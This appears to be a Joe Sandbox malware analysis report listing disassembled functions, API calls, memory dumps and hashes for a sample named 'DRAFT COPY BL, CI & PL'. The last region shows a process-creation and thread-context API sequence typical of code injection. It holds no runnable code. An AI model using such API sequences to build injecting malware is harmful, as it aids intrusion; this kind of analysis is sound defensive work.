                                                                • Snapshot File: hcaresult_0_2_10d6000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                • String ID:
                                                                • API String ID: 2438371351-0
                                                                • Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                • Instruction ID: cd59d319c5ecf8afb73a52ac58fccad1400707fc51ff79db8358b4dce4a528eb
                                                                • Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                • Instruction Fuzzy Hash: 81620C30A14658DBEB24CFA4C850BDEB776EF58300F1091A9D24DEB3A0E7759E81CB59
                                                                Function 0099955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00934EE5: _fseek.LIBCMT ref: 00934EFD
                                                                  • Part of subcall function 00999734: _wcscmp.LIBCMT ref: 00999824
                                                                  • Part of subcall function 00999734: _wcscmp.LIBCMT ref: 00999837
                                                                • _free.LIBCMT ref: 009996A2
                                                                • _free.LIBCMT ref: 009996A9
                                                                • _free.LIBCMT ref: 00999714
                                                                  • Part of subcall function 00952D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00959A24), ref: 00952D69
                                                                  • Part of subcall function 00952D55: GetLastError.KERNEL32(00000000,?,00959A24), ref: 00952D7B
                                                                • _free.LIBCMT ref: 0099971C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                • String ID:
                                                                • API String ID: 1552873950-0
                                                                • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                • Instruction ID: 0400faff9ead567a6142d718e4276b12a8eda673302bc35f73ce8b7fe2f2c687
                                                                • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                • Instruction Fuzzy Hash: 955130B1904258AFDF24DFA9DC81B9EBBB9EF88304F14449EF509A3241DB715A80CF58
                                                                Function 0095470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                • String ID:
                                                                • API String ID: 2782032738-0
                                                                • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                • Instruction ID: 62e90bcf165770119827411e05ec30275b5c34e679416bdc38294528d45808b2
                                                                • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                • Instruction Fuzzy Hash: F441D634A00746ABDB58CE6BC8809AE77A9EF8536AB24857DED15C7640E770DDC88B40
                                                                Function 009344A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 009344CF
                                                                  • Part of subcall function 0093407C: _memset.LIBCMT ref: 009340FC
                                                                  • Part of subcall function 0093407C: _wcscpy.LIBCMT ref: 00934150
                                                                  • Part of subcall function 0093407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00934160
                                                                • KillTimer.USER32(?,00000001,?,?), ref: 00934524
                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00934533
                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0096D4B9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                • String ID:
                                                                • API String ID: 1378193009-0
                                                                • Opcode ID: 4f2941dad31fd706d2fb9a813227ec17d50d3ae10108c19e0cba16fba12810d4
                                                                • Instruction ID: e47b6d717d77d8e24f592e78c2a32b39cf24a18458c77da786dc3fc8d60cc0f8
                                                                • Opcode Fuzzy Hash: 4f2941dad31fd706d2fb9a813227ec17d50d3ae10108c19e0cba16fba12810d4
                                                                • Instruction Fuzzy Hash: A721F5709097849FE7328B248895BE7BBEC9F05315F04049EF79A56291C7742E84DB41
                                                                Function 00937285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 0096EA39
                                                                • GetOpenFileNameW.COMDLG32(?), ref: 0096EA83
                                                                  • Part of subcall function 00934750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00934743,?,?,009337AE,?), ref: 00934770
                                                                  • Part of subcall function 00950791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009507B0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Name$Path$FileFullLongOpen_memset
                                                                • String ID: X
                                                                • API String ID: 3777226403-3081909835
                                                                • Opcode ID: a4e7b613c7ba080fb54a4dd37931d41c6e00445c65f97d505c6b7e7daae7d885
                                                                • Instruction ID: 3c2adcba35f25965429168bca3bcec9256949df1a743a3d94714ad7f72a07f98
                                                                • Opcode Fuzzy Hash: a4e7b613c7ba080fb54a4dd37931d41c6e00445c65f97d505c6b7e7daae7d885
                                                                • Instruction Fuzzy Hash: D721AE70A142889BCB51DFD4C845BEEBBFCAF89714F04405AE918AB241DBB459898FA1
                                                                Function 009998E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 009998F8
                                                                • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0099990F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Temp$FileNamePath
                                                                • String ID: aut
                                                                • API String ID: 3285503233-3010740371
                                                                • Opcode ID: 79df791365e08b25e31a735fbaf2fae0fb68e860e3fc340bf3e2aced5517e746
                                                                • Instruction ID: f6aace927404024604050f7df1ae0cf37312038147b4a5cd976172de3ee59e05
                                                                • Opcode Fuzzy Hash: 79df791365e08b25e31a735fbaf2fae0fb68e860e3fc340bf3e2aced5517e746
                                                                • Instruction Fuzzy Hash: 37D05E7954430DABDB50DBA4DD0EF9A773CEB04704F0003B1BF64D11A1EAB199989B91
                                                                Function 009ACADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1c69e742662d1c721d161181c19908fcc487fb5043f2f14d8b56e038ea96f5a5
                                                                • Instruction ID: 9948664fd7a898f838e12120a27750f4681a4e88fd9375ab92a932ea793bc2ab
                                                                • Opcode Fuzzy Hash: 1c69e742662d1c721d161181c19908fcc487fb5043f2f14d8b56e038ea96f5a5
                                                                • Instruction Fuzzy Hash: DFF115B56083019FCB14DF28C484A6ABBE5FFC9314F54892EF8999B291D770E945CF82
                                                                Function 0093434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 00934370
                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00934415
                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00934432
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: IconNotifyShell_$_memset
                                                                • String ID:
                                                                • API String ID: 1505330794-0
                                                                • Opcode ID: caddf578c841b3c644ee98a42450f742c034b8c8950144471abaafe4d7a2cbc2
                                                                • Instruction ID: b8766fe4fe717b511f0f1c01a693e1782d415eac81c039d1d6b90c0d9f5722f1
                                                                • Opcode Fuzzy Hash: caddf578c841b3c644ee98a42450f742c034b8c8950144471abaafe4d7a2cbc2
                                                                • Instruction Fuzzy Hash: 783193705087018FC720DF24D8846ABBBF8FB48319F010A2EF69A83251D771B944CF52
                                                                Function 0095571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • __FF_MSGBANNER.LIBCMT ref: 00955733
                                                                  • Part of subcall function 0095A16B: __NMSG_WRITE.LIBCMT ref: 0095A192
                                                                  • Part of subcall function 0095A16B: __NMSG_WRITE.LIBCMT ref: 0095A19C
                                                                • __NMSG_WRITE.LIBCMT ref: 0095573A
                                                                  • Part of subcall function 0095A1C8: GetModuleFileNameW.KERNEL32(00000000,009F33BA,00000104,?,00000001,00000000), ref: 0095A25A
                                                                  • Part of subcall function 0095A1C8: ___crtMessageBoxW.LIBCMT ref: 0095A308
                                                                  • Part of subcall function 0095309F: ___crtCorExitProcess.LIBCMT ref: 009530A5
                                                                  • Part of subcall function 0095309F: ExitProcess.KERNEL32 ref: 009530AE
                                                                  • Part of subcall function 00958B28: __getptd_noexit.LIBCMT ref: 00958B28
                                                                • RtlAllocateHeap.NTDLL(00E70000,00000000,00000001,00000000,?,?,?,00950DD3,?), ref: 0095575F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                • String ID:
                                                                • API String ID: 1372826849-0
                                                                • Opcode ID: c02c326ce77128b736ad5b883e560d3b957ecdc859c3fd7362cbe52a08444def
                                                                • Instruction ID: 58e7be904b666babfc267c3080f587e44a237cfc2cf27efcf879201448e921b5
                                                                • Opcode Fuzzy Hash: c02c326ce77128b736ad5b883e560d3b957ecdc859c3fd7362cbe52a08444def
                                                                • Instruction Fuzzy Hash: 2401F571204B01DBD610E73BECA2B2E775C8BC6363F520525FC05AB1C2DE749C089760
                                                                Function 009998A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00999548,?,?,?,?,?,00000004), ref: 009998BB
                                                                • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00999548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 009998D1
                                                                • CloseHandle.KERNEL32(00000000,?,00999548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009998D8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: File$CloseCreateHandleTime
                                                                • String ID:
                                                                • API String ID: 3397143404-0
                                                                • Opcode ID: 0ac7605e06c299cddb2525a18f229dd23fada1a1d89fe255885024232106cb35
                                                                • Instruction ID: 0828f0a1e7a32946ba0304a719af4352b1fdf6d405845470a7bbd98d4a664eac
                                                                • Opcode Fuzzy Hash: 0ac7605e06c299cddb2525a18f229dd23fada1a1d89fe255885024232106cb35
                                                                • Instruction Fuzzy Hash: 90E08632144214BBDB211B58ED09FCA7B59AB06770F144220FB14790E087B12511A798
                                                                Function 00998D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _free.LIBCMT ref: 00998D1B
                                                                  • Part of subcall function 00952D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00959A24), ref: 00952D69
                                                                  • Part of subcall function 00952D55: GetLastError.KERNEL32(00000000,?,00959A24), ref: 00952D7B
                                                                • _free.LIBCMT ref: 00998D2C
                                                                • _free.LIBCMT ref: 00998D3E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                • Instruction ID: 7216a9ee791a8c9aca6101730682680eb7a4c306205400dd7a9bd07383ce197c
                                                                • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                • Instruction Fuzzy Hash: F4E017A170160146CF24E6BEA940B9323EC4F9E393B14091EB80DD71C6CE64F8868238
                                                                Function 0093A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: CALL
                                                                • API String ID: 0-4196123274
                                                                • Opcode ID: 881069a45a7204ad4ec4b5c433e8385afd48a37722d93d40b7354dfaa68aa211
                                                                • Instruction ID: 371b364b5810a7b4b9330724412bb30707c02d9b0bb37f670125216306be3aca
                                                                • Opcode Fuzzy Hash: 881069a45a7204ad4ec4b5c433e8385afd48a37722d93d40b7354dfaa68aa211
                                                                • Instruction Fuzzy Hash: 16224471608301DFCB24DF24C494B6ABBE5BF89304F15896DE89A9B262D735EC45CF82
                                                                Function 00934C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _memmove
                                                                • String ID: EA06
                                                                • API String ID: 4104443479-3962188686
                                                                • Opcode ID: 503d321407dc18c0e044f45dd9742f12fca82ee22ace8c3b24c67a764d696d11
                                                                • Instruction ID: 68a9f52713ab42ea0a86741714e5dfeafec6482b18189a845b40b94bf927148a
                                                                • Opcode Fuzzy Hash: 503d321407dc18c0e044f45dd9742f12fca82ee22ace8c3b24c67a764d696d11
                                                                • Instruction Fuzzy Hash: 7B419D31A041585BCF219B64CC517BE7FA6DF86300F6A4475EC92DB2C2D624BD848FA1
                                                                Function 00937A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _memmove
                                                                • String ID:
                                                                • API String ID: 4104443479-0
                                                                • Opcode ID: 90bd321d2d4002fe64be31f1e07dedb99f9dafd3dbe204682925cf71906d1429
                                                                • Instruction ID: e22a6dd7233704651cf12ed51dfae2775780911b45ace26e8ae3909af5983f13
                                                                • Opcode Fuzzy Hash: 90bd321d2d4002fe64be31f1e07dedb99f9dafd3dbe204682925cf71906d1429
                                                                • Instruction Fuzzy Hash: AC31B8F1604606AFC714DFA8D8D1E69F3A9FF88310B158629E919CB391EB34E914CF90
                                                                Function 00950DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0095571C: __FF_MSGBANNER.LIBCMT ref: 00955733
                                                                  • Part of subcall function 0095571C: __NMSG_WRITE.LIBCMT ref: 0095573A
                                                                  • Part of subcall function 0095571C: RtlAllocateHeap.NTDLL(00E70000,00000000,00000001,00000000,?,?,?,00950DD3,?), ref: 0095575F
                                                                • std::exception::exception.LIBCMT ref: 00950DEC
                                                                • __CxxThrowException@8.LIBCMT ref: 00950E01
                                                                  • Part of subcall function 0095859B: RaiseException.KERNEL32(?,?,?,009E9E78,00000000,?,?,?,?,00950E06,?,009E9E78,?,00000001), ref: 009585F0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                • String ID:
                                                                • API String ID: 3902256705-0
                                                                • Opcode ID: d301c18c2298dc5783b999cf1181f9561ea4510ed742ab45333b110bb9c11284
                                                                • Instruction ID: de7e0a0a67f639919396b1cdc6593c296ee0ff404e9342c823ce55fd2cea596f
                                                                • Opcode Fuzzy Hash: d301c18c2298dc5783b999cf1181f9561ea4510ed742ab45333b110bb9c11284
                                                                • Instruction Fuzzy Hash: EDF0813190431A66DB20FB96EC06BDF77AC9F91352F104869FD08A6191DF719A8887D1
                                                                Function 009553A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00958B28: __getptd_noexit.LIBCMT ref: 00958B28
                                                                • __lock_file.LIBCMT ref: 009553EB
                                                                  • Part of subcall function 00956C11: __lock.LIBCMT ref: 00956C34
                                                                • __fclose_nolock.LIBCMT ref: 009553F6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                • String ID:
                                                                • API String ID: 2800547568-0
                                                                • Opcode ID: 3ea41c997b8b69f03f18cb0c7c3f8fe5c2ebb1673622afd1b89a1864d806637d
                                                                • Instruction ID: 326bf34b989e18921e680f8f00ac8b952afdb6233c821b88fad79d9923062520
                                                                • Opcode Fuzzy Hash: 3ea41c997b8b69f03f18cb0c7c3f8fe5c2ebb1673622afd1b89a1864d806637d
                                                                • Instruction Fuzzy Hash: 56F09631800A04DAD711FF6798127AE76E46F81377F228114AC68BB1D2CBFC49499B51
                                                                Function 010D78B5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 010D8073
                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 010D8109
                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 010D812B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708705720.00000000010D6000.00000040.00000020.00020000.00000000.sdmp, Offset: 010D6000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10d6000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                • String ID:
                                                                • API String ID: 2438371351-0
                                                                • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
